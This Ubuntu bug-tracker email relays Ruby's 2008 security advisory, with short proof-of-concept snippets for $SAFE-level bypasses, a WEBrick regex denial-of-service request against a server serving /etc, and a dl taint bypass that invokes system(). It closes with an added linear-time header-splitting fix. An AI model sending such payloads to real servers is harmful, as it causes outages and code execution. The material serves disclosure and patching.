*** This bug is a security vulnerability *** You have been subscribed to a public security bug by Jamie Strandboge (jdstrand):
Last month Common Vulnerabilities and Exposures reported multiple vulnerabilities that appear to be serious, as an attacker can cause a denial of service condition or execute arbitrary code.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2662
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2663
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2725
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2726
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2664

Today the following was reported:

Several vulnerabilities in safe level have been discovered.

* untrace_var is permitted at safe level 4.

    trace_var(:$VAR) {|val| puts "$VAR = #{val}" }
    Thread.new do
      $SAFE = 4
      eval %q{
        proc = untrace_var :$VAR
        proc.first.call("aaa")
      }
    end.join

* $PROGRAM_NAME may be modified at safe level 4.

    Thread.new do
      $SAFE = 4
      eval %q{$PROGRAM_NAME.replace "Hello, World!"}
    end.join
    $PROGRAM_NAME #=> "Hello, World!"

* Insecure methods may be called at safe level 1-3.

    class Hello
      def world
        Thread.new do
          $SAFE = 4
          msg = "Hello, World!"
          def msg.size
            self.replace self*10 # replace string
            1 # return wrong size
          end
          msg
        end.value
      end
    end

    $SAFE = 1 # or 2, or 3
    s = Hello.new.world
    if s.kind_of?(String)
      puts s if s.size < 20 # print string whose size is less than 20
    end

* Syslog operations are permitted at safe level 4.

    require "syslog"
    Syslog.open
    Thread.new do
      $SAFE = 4
      eval %q{
        Syslog.log(Syslog::LOG_WARNING, "Hello, World!")
        Syslog.mask = Syslog::LOG_UPTO(Syslog::LOG_EMERG)
        Syslog.info("masked")
        Syslog.close
      }
    end.join

These vulnerabilities were reported by Keita Yamaguchi.

http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/

DoS vulnerability in WEBrick

WEBrick::HTTP::DefaultFileHandler is vulnerable to requests that take exponential time, due to a backtracking regular expression in WEBrick::HTTPUtils.split_header_value.

Exploitable server:

    require 'webrick'
    WEBrick::HTTPServer.new(:Port => 2000, :DocumentRoot => "/etc").start

Attack:

    require 'net/http'
    res = Net::HTTP.start("localhost", 2000) { |http|
      req = Net::HTTP::Get.new("/passwd")
      req['If-None-Match'] = %q{meh=""} + %q{foo="bar" } * 100
      http.request(req)
    }
    p res

The request likely won't finish in this universe.

This vulnerability was reported by Christian Neukirchen.

Lack of taintness check in dl

dl doesn't check taintness, so it could allow attackers to call dangerous functions.

    require 'dl'
    $SAFE = 1
    h = DL.dlopen(nil)
    sys = h.sym('system', 'IP')
    uname = 'uname -rs'.taint
    sys[uname]

This vulnerability was reported by sheepman.

DNS spoofing vulnerability in resolv.rb

resolv.rb allows remote attackers to spoof DNS answers. This risk can be reduced by randomness of DNS transaction IDs and source ports, so resolv.rb is fixed to randomize them.

* see also: CVE-2008-1447

This vulnerability was reported by Tanaka Akira.

Unfortunately, the suggestion to upgrade to the most recent version may also be a bad idea, as multiple individuals including myself have found that we get segmentation faults in the latest version.

** Affects: ruby-defaults (Ubuntu)
     Importance: Undecided
         Status: New

--
multiple new ruby security vulnerabilities
https://bugs.launchpad.net/bugs/255971
You received this bug notification because you are a member of Ubuntu Bugs, which is a direct subscriber.

--
ubuntu-bugs mailing list
[email protected]
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
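The WEBrick issue in the report above is a classic regular-expression denial of service: a header value built from many quoted segments makes a backtracking regex do exponential work. The added example below is not WEBrick's code and not part of the bug report; it shows the mitigation pattern a maintainer would reach for, namely replacing the regex with a single-pass character scanner that splits a comma-separated header value while honouring quoted strings and backslash escapes, so that the pathological If-None-Match value from the report is handled in linear time. The function name split_header_value_linear and the timing helper time_split are assumptions introduced here, and the sample header values are constructed for illustration.

```ruby
require 'benchmark'

# Added example, not WEBrick's own implementation: split a comma-separated
# HTTP header value (e.g. If-None-Match) into its elements in one pass.
# Commas inside double-quoted strings are not separators, and a backslash
# inside a quoted string escapes the next character. Because the scanner
# never backtracks, runtime is linear in the input length regardless of how
# many quoted segments the value contains.
def split_header_value_linear(str)
  values = []
  current = +""
  in_quotes = false
  escaped = false

  str.each_char do |ch|
    if escaped
      # Character following a backslash inside quotes: copy it verbatim.
      current << ch
      escaped = false
    elsif in_quotes && ch == "\\"
      current << ch
      escaped = true
    elsif ch == '"'
      # Toggle quoted state; the quote itself is kept in the element.
      in_quotes = !in_quotes
      current << ch
    elsif ch == "," && !in_quotes
      values << current.strip
      current = +""
    else
      current << ch
    end
  end

  values << current.strip
  values.reject(&:empty?)
end

# Wall-clock seconds taken to split a header value; useful as a regression
# check that a pathological input stays cheap.
def time_split(str)
  Benchmark.realtime { split_header_value_linear(str) }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed inputs: a normal ETag list and the shape of value used in
  # the report (a run of quoted segments with no separating commas).
  p split_header_value_linear('W/"abc", "def"')
  pathological = %q{meh=""} + %q{foo="bar" } * 100
  printf("pathological value (%d bytes) split in %.4f s\n",
         pathological.bytesize, time_split(pathological))
end
```

Because the scanner only ever advances, the cost of the report's 100-segment value (and of the same value repeated many times over) is a single linear pass; a regex-based splitter that backtracks over the quoted segments is what turns the same input into a request that "won't finish in this universe".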
